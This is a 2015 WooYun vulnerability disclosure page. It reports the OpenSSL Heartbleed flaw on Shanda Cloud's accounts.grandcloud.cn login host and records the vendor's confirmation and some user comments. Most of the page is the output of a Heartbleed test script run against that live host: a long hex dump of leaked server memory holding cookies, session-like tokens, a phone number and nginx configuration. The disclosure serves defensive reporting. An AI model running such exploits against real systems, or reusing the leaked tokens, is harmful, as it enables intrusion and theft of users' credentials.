盛大云某入口存在openssl心脏滴血漏洞 | wooyun-2015-0106737| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0106737

漏洞标题：盛大云某入口存在openssl心脏滴血漏洞

漏洞作者：路人甲

提交时间：2015-04-09 09:20

修复时间：2015-05-24 09:56

公开时间：2015-05-24 09:56

漏洞类型：系统/服务补丁不及时

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-09：细节已通知厂商并且等待厂商处理中
2015-04-09：厂商已经确认，细节仅向厂商公开
2015-04-19：细节向核心白帽子及相关领域专家公开
2015-04-29：细节向普通白帽子公开
2015-05-09：细节向实习白帽子公开
2015-05-24：细节向公众公开

简要描述：

这年头还存在心脏滴血漏洞？？
运维真是日了狗了...

详细说明：

https://accounts.grandcloud.cn

漏洞证明：

python ssltest.py accounts.grandcloud.cn
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 2542
 ... received message: type = 22, ver = 0302, length = 525
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 FF FF D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  ......SC[...r...
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  0100: 6F 38 2B 4F 75 53 4D 45 43 74 46 48 41 78 76 54  o8+OuSMECtFHAxvT
  0140: 4F 65 53 56 39 36 7A 62 34 46 35 55 43 45 74 30  OeSV96zb4F5UCEt0
  0180: 43 38 72 4B 47 79 49 63 33 65 75 4A 2B 76 58 5A  C8rKGyIc3euJ+vXZ
  01c0: 56 65 31 6F 65 48 67 47 30 75 62 39 4B 36 46 49  Ve1oeHgG0ub9K6FI
  0200: 78 6D 4F 34 69 51 2B 58 72 67 63 52 44 42 37 63  xmO4iQ+XrgcRDB7c
  0240: 61 65 62 39 64 66 32 64 64 64 37 35 61 30 3B 20  aeb9df2ddd75a0; 
  0280: 35 30 3B 20 48 6D 5F 6C 70 76 74 5F 31 32 63 30  50; Hm_lpvt_12c0
  02c0: 20 2A 2F 2A 0D 0A 52 65 66 65 72 65 72 3A 20 68   */*..Referer: h
  0300: 6E 65 3D 31 33 31 36 37 31 37 37 32 39 31 0D 0A  ne=13167177291..
  0340: 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 35 2E  gent: Mozilla/5.
  0380: 54 4D 4C 2C 20 6C 69 6B 65 20 47 65 63 6B 6F 29  TML, like Gecko)
  03c0: 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 2D  : application/x-
  0400: 6E 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B  n..Connection: K
  0440: 61 FF B8 63 01 F3 AF E6 18 58 CE 5C 06 25 5C 5A  a..c.....X.\.%\Z
  0480: 35 E3 E2 D4 68 F5 35 0A 6F 85 22 B1 74 49 2F D5  5...h.5.o.".tI/.
  04c0: 64 36 74 52 31 42 25 32 46 25 32 42 6E 59 25 32  d6tR1B%2F%2BnY%2
  0500: 37 54 6E 44 4D 63 53 66 58 4D 4E 66 66 4B 79 50  7TnDMcSfXMNffKyP
  0540: 25 32 46 6E 4C 25 32 46 32 38 50 53 39 4A 79 37  %2FnL%2F28PS9Jy7
  0580: 4A 4B 48 62 4B 37 79 66 55 63 4B 55 35 4E 59 4C  JKHbK7yfUcKU5NYL
  05c0: 38 56 4D 34 69 4F 63 75 43 43 50 4D 59 36 6E 55  8VM4iOcuCCPMY6nU
  0600: 41 36 54 45 48 57 31 49 63 6E 79 35 56 74 25 32  A6TEHW1Icny5Vt%2
  0640: 51 46 61 44 75 59 7A 7A 48 32 4C 70 37 68 53 42  QFaDuYzzH2Lp7hSB
  0680: 4A 57 52 7A 4E 4E 77 6C 46 41 56 66 54 53 35 4A  JWRzNNwlFAVfTS5J
  06c0: 37 73 41 46 4E 55 69 52 76 38 69 4F 4F 79 73 54  7sAFNUiRv8iOOysT
  0700: 62 54 6C 51 36 65 71 4B 75 63 35 79 46 25 32 42  bTlQ6eqKuc5yF%2B
  0740: 38 4F 61 4B 41 25 33 44 3B 20 5F 5F 75 74 6D 61  8OaKA%3D; __utma
  0780: 36 32 34 39 2E 31 3B 20 5F 5F 75 74 6D 62 3D 38  6249.1; __utmb=8
  07c0: 3D 38 35 34 36 32 34 37 39 2E 31 34 32 38 35 30  =85462479.142850
  0800: 65 66 65 72 72 61 6C 29 7C 75 74 6D 63 6D 64 3D  eferral)|utmcmd=
  0840: 33 63 32 31 62 64 61 34 34 38 64 62 34 37 3B 20  3c21bda448db47; 
  0880: 32 33 2C 31 34 32 38 35 30 35 36 35 34 3B 20 48  23,1428505654; H
  08c0: 30 34 3B 20 43 53 52 46 5F 43 4F 4F 4B 49 45 3D  04; CSRF_COOKIE=
  0900: 94 3A B4 6A 6B 24 60 DD 07 07 07 07 07 07 07 07  .:.jk$`.........
  0940: A7 AB 59 14 F4 95 F0 35 C9 5D CB C7 9B 9A F9 DA  ..Y....5.]......
  0980: 5C 50 B7 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  \P..............
  09c0: 2E EE CF 96 21 93 19 9E DB 34 95 34 F3 9C 95 00  ....!....4.4....
  0a00: 8C 2A DE C9 B1 2C 1A C2 33 61 D3 6E 36 7B 80 C6  .*...,..3a.n6{..
  0a40: 57 31 56 69 D0 47 4A 50 9E 5C 99 FE B3 6C 1C 81  W1Vi.GJP.\...l..
  0a80: 37 3B 95 C8 1D 09 85 20 B7 D8 CB C1 1C 6A D0 F8  7;..... .....j..
  0ac0: 51 34 38 4F 6B 62 78 38 57 63 61 55 57 75 4B 63  Q48Okbx8WcaUWuKc
  0b00: 6D 74 48 4B 63 45 4F 35 25 32 42 42 71 62 43 59  mtHKcEO5%2BBqbCY
  0b40: 6E 25 32 42 47 54 5A 6D 44 45 6F 65 25 32 46 38  n%2BGTZmDEoe%2F8
  0b80: 4E 56 65 7A 73 4D 64 35 47 44 67 4A 45 5A 6E 48  NVezsMd5GDgJEZnH
  0bc0: 4D 74 47 39 50 4D 32 7A 63 74 66 62 73 75 42 57  MtG9PM2zctfbsuBW
  0c00: 32 46 58 79 77 62 44 45 37 4B 4D 31 33 57 7A 50  2FXywbDE7KM13WzP
  0c40: 4C 64 65 4F 50 54 51 4E 76 59 36 79 70 4D 6F 68  LdeOPTQNvY6ypMoh
  0c80: 32 42 76 34 48 63 4B 4F 5A 68 39 76 45 34 67 4A  2Bv4HcKOZh9vE4gJ
  0cc0: 50 25 32 42 6C 32 55 49 55 6E 71 54 47 70 48 32  P%2Bl2UIUnqTGpH2
  0d00: 4A 55 47 48 4E 59 6B 25 33 44 0D 0A 0D 0A 25 88  JUGHNYk%3D....%.
  0d40: 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0d80: FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00  ................
  0dc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0e00: 05 00 00 00 00 00 00 00 B8 1B 47 00 00 00 00 00  ..........G.....
  0e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0e80: 00 00 00 00 00 00 00 00 B8 DD 46 00 00 00 00 00  ..........F.....
  0ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0f00: FF FF FF FF FF FF FF FF 08 00 00 00 00 00 00 00  ................
  0f40: 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0f80: FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00  ................
  0fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1000: 04 00 00 00 00 00 00 00 DB 21 47 00 00 00 00 00  .........!G.....
  1040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1080: 00 00 00 00 00 00 00 00 60 EA 00 00 00 00 00 00  ........`.......
  10c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1100: 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  11c0: 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00  ................
  1200: 00 00 00 00 00 00 00 00 F0 5C 68 00 00 00 00 00  .........\h.....
  1240: 04 00 00 00 00 00 00 00 00 20 00 00 00 00 00 00  ......... ......
  1280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  12c0: FE FF FF FF FF FF FF FF FE FF FF FF FF FF FF FF  ................
  1300: 00 00 00 00 00 00 00 00 B8 DD 46 00 00 00 00 00  ..........F.....
  1340: 97 ED 46 00 00 00 00 00 00 00 00 00 00 00 00 00  ..F.............
  1380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  13c0: 00 61 63 63 65 73 73 5F 6C 6F 67 00 00 6F 66 66  .access_log..off
  1400: 04 00 00 00 00 00 00 00 30 BC D7 00 00 00 00 00  ........0.......
  1440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1480: 28 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00  (...............
  14c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1500: 61 70 70 2F 6E 67 69 6E 78 2F 63 6F 6E 66 2F 76  app/nginx/conf/v
  1540: 40 C8 D7 00 00 00 00 00 90 D9 D2 00 00 00 00 00  @...............
  1580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  15c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  16c0: 68 DF D2 00 00 00 00 00 78 DF D2 00 00 00 00 00  h.......x.......
  1700: 20 E0 D2 00 00 00 00 00 70 E0 D2 00 00 00 00 00   .......p.......
  1740: 00 00 00 00 00 00 00 00 80 EB D2 00 00 00 00 00  ................
  1780: 00 00 00 00 00 00 00 00 E8 EB D2 00 00 00 00 00  ................
  17c0: 68 ED D2 00 00 00 00 00 00 00 00 00 00 00 00 00  h...............
  1800: 78 D9 D2 00 00 00 00 00 16 00 00 00 00 00 00 00  x...............
  1840: 60 EA 00 00 00 00 00 00 01 00 00 00 00 00 00 00  `...............
  1880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  18c0: 00 00 00 00 00 00 00 00 23 00 00 00 00 00 00 00  ........#.......
  1900: D0 9B D4 00 00 00 00 00 3D 00 00 00 00 00 00 00  ........=.......
  1940: 00 00 00 00 00 00 00 00 B4 05 00 00 00 00 00 00  ................
  1980: 80 A9 03 00 00 00 00 00 30 75 00 00 00 00 00 00  ........0u......
  19c0: 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00  ................
  1a00: 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00  ................
  1a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1c40: 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1c80: 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00  ................
  1cc0: 00 00 00 00 00 00 00 00 B8 DD 46 00 00 00 00 00  ..........F.....
  1d00: 10 00 00 00 00 00 00 00 E9 FB 46 00 00 00 00 00  ..........F.....
  1d40: 60 EA 00 00 00 00 00 00 00 00 00 00 00 00 00 00  `...............
  1d80: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF  ................
  1dc0: 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00  ................
  1e00: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF  ................
  1e40: 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1e80: 01 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00  ................
  1ec0: C0 C4 D4 00 00 00 00 00 03 00 00 00 00 00 00 00  ................
  1f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1f40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  1fc0: E8 03 00 00 00 00 00 00 00 02 00 00 00 00 00 00  ................
  2000: 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00  ................
  2040: 10 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00  ................
  2080: 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00  ................
  20c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2140: 60 17 47 00 00 00 00 00 00 00 00 00 00 00 00 00  `.G.............
  2180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  21c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2200: 60 EA 00 00 00 00 00 00 60 EA 00 00 00 00 00 00  `.......`.......
  2240: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF  ................
  2280: 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00  ................
  22c0: 0F 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF  ................
  2300: 00 00 00 00 00 00 00 00 88 13 00 00 00 00 00 00  ................
  2340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2380: 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  23c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2400: 60 EA 00 00 00 00 00 00 60 EA 00 00 00 00 00 00  `.......`.......
  2440: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF  ................
  2480: 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00  ................
  24c0: 0F 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF  ................
  2500: 00 00 00 00 00 00 00 00 88 13 00 00 00 00 00 00  ................
  2540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2580: 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  25c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2600: 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2680: 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  26c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2740: FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00  ................
  2780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  27c0: 80 DA D5 00 00 00 00 00 0B 00 00 00 00 00 00 00  ................
  2800: 4C 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00  L...............
  2840: FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2880: 00 00 00 00 00 00 00 00 B8 DD 46 00 00 00 00 00  ..........F.....
  28c0: FF FF FF FF FF FF FF FF 03 00 00 00 00 00 00 00  ................
  2900: B8 DD 46 00 00 00 00 00 00 00 00 00 00 00 00 00  ..F.............
  2940: 6C 69 73 74 65 6E 00 00 38 30 00 00 73 65 72 76  listen..80..serv
  2980: 65 78 00 00 69 6E 64 65 78 2E 68 74 6D 6C 00 00  ex..index.html..
  29c0: 04 00 00 00 00 00 00 00 30 BC D7 00 00 00 00 00  ........0.......
  2a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2ac0: 69 6F 6E 00 00 7E 00 00 2E 2A 5C 2E 28 70 68 70  ion..~...*\.(php
  2b00: F0 F2 D2 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2b40: B0 F3 D2 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2b80: 08 F7 D2 00 00 00 00 00 20 F9 D2 00 00 00 00 00  ........ .......
  2bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2c00: 40 FF D2 00 00 00 00 00 70 FF D2 00 00 00 00 00  @.......p.......
  2c40: 00 EF D2 00 00 00 00 00 A0 00 D3 00 00 00 00 00  ................
  2c80: 8F D0 45 00 00 00 00 00 00 00 00 00 00 00 00 00  ..E.............
  2cc0: 28 40 D2 00 00 00 00 00 D0 9B D4 00 00 00 00 00  (@..............
  2d00: 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00  . ..............
  2d40: C0 D4 01 00 00 00 00 00 80 A9 03 00 00 00 00 00  ................
  2d80: 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2dc0: 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00  ................
  2e00: 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2e80: 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2f00: 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2f40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3000: 00 00 00 00 00 00 00 00 0A 00 00 00 00 00 00 00  ................
  3040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3080: FF FF FF FF FF FF FF FF 08 00 00 00 00 00 00 00  ................
  30c0: 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3100: FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00  ................
  3140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3180: 05 00 00 00 00 00 00 00 22 00 47 00 00 00 00 00  ........".G.....
  31c0: 03 00 00 00 00 00 00 00 D8 C0 D4 00 00 00 00 00  ................
  3200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  32c0: 00 02 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ........@.......
  3300: 00 00 04 00 00 00 00 00 00 00 08 00 00 00 00 00  ................
  3340: 00 00 04 00 00 00 00 00 01 00 00 00 00 00 00 00  ................
  3380: 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  33c0: 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00  ................
  3400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3440: 09 00 00 00 00 00 00 00 57 01 D3 00 00 00 00 00  ........W.......
  3480: 00 00 00 00 00 00 00 00 A8 18 D5 00 00 00 00 00  ................
  34c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3500: 60 EA 00 00 00 00 00 00 00 00 00 00 00 00 00 00  `...............
  3540: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF  ................
  3580: 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00  ................
  35c0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF  ................
  3600: 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3640: 00 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00  ................
  3680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  36c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3700: 60 EA 00 00 00 00 00 00 00 00 00 00 00 00 00 00  `...............
  3740: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF  ................
  3780: 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00  ................
  37c0: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF  ................
  3800: 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3840: 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00  ................
  3880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  38c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3940: 00 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00  ................
  3980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  39c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3a80: 0B 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00  ................
  3ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3b00: 00 00 00 00 00 00 00 00 FE FF FF FF FF FF FF FF  ................
  3b40: B8 DD 46 00 00 00 00 00 00 00 00 00 00 00 00 00  ..F.............
  3b80: 03 00 00 00 00 00 00 00 97 ED 46 00 00 00 00 00  ..........F.....
  3bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3c00: 00 00 00 00 0D 00 00 00 01 00 00 00 00 00 2E 02  ................
  3c40: 1C 68 1C 70 1C 35 54 00 09 1C 68 1C 74 1C 6D 55  .h.p.5T...h.t.mU
  3c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3cc0: 75 0C 44 00 00 00 00 00 20 AE D4 00 00 00 00 00  u.D..... .......
  3d00: 0B 00 00 00 00 00 00 00 28 23 00 00 00 00 00 00  ........(#......
  3d40: 00 2F 6F 70 74 2F 61 70 70 2F 6E 67 69 6E 78 2F  ./opt/app/nginx/
  3d80: 00 00 24 64 6F 63 75 6D 65 6E 74 5F 72 6F 6F 74  ..$document_root
  3dc0: 20 00 00 00 00 00 00 00 30 BC D7 00 00 00 00 00   .......0.......
  3e00: B7 02 D3 00 00 00 00 00 0D 00 00 00 00 00 00 00  ................
  3e40: 00 00 00 00 00 00 00 00 0C 00 00 00 00 00 00 00  ................
  3e80: 55 45 52 59 5F 53 54 52 49 4E 47 00 00 24 71 75  UERY_STRING..$qu
  3ec0: 65 73 74 5F 6D 65 74 68 6F 64 00 00 66 61 73 74  est_method..fast
  3f00: 70 61 72 61 6D 00 00 43 4F 4E 54 45 4E 54 5F 4C  param..CONTENT_L
  3f40: 4D 45 00 00 24 66 61 73 74 63 67 69 5F 73 63 72  ME..$fastcgi_scr
  3f80: 72 69 00 00 66 61 73 74 63 67 69 5F 70 61 72 61  ri..fastcgi_para
  3fc0: 4F 43 55 4D 45 4E 54 5F 52 4F 4F 54 00 00 24 64  OCUMENT_ROOT..$d

修复方案：

拖出去打死..

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-04-09 09:54

厂商回复：

不好意思确认晚了，已转交给盛大云！

漏洞评价：

2015-04-09 10:58 | 大王叫我去巡山 ( 路人 | Rank:7 漏洞数:3 | 大王叫我去巡山)

运维真是日了狗了...
2015-04-09 10:59 | zeracker ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

运维真是日了狗了...
2015-04-09 11:03 | 子非海绵宝宝 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

前几天不刚好openssl心脏滴血漏洞一周年么

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0106737

漏洞标题：盛大云某入口存在openssl心脏滴血漏洞

相关厂商：盛大网络

漏洞作者：路人甲

提交时间：2015-04-09 09:20

修复时间：2015-05-24 09:56

公开时间：2015-05-24 09:56

漏洞类型：系统/服务补丁不及时

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0106737

漏洞标题：盛大云某入口存在openssl心脏滴血漏洞

相关厂商：盛大网络

漏洞作者： 路人甲

提交时间：2015-04-09 09:20

修复时间：2015-05-24 09:56

公开时间：2015-05-24 09:56

漏洞类型：系统/服务补丁不及时

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0106737"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云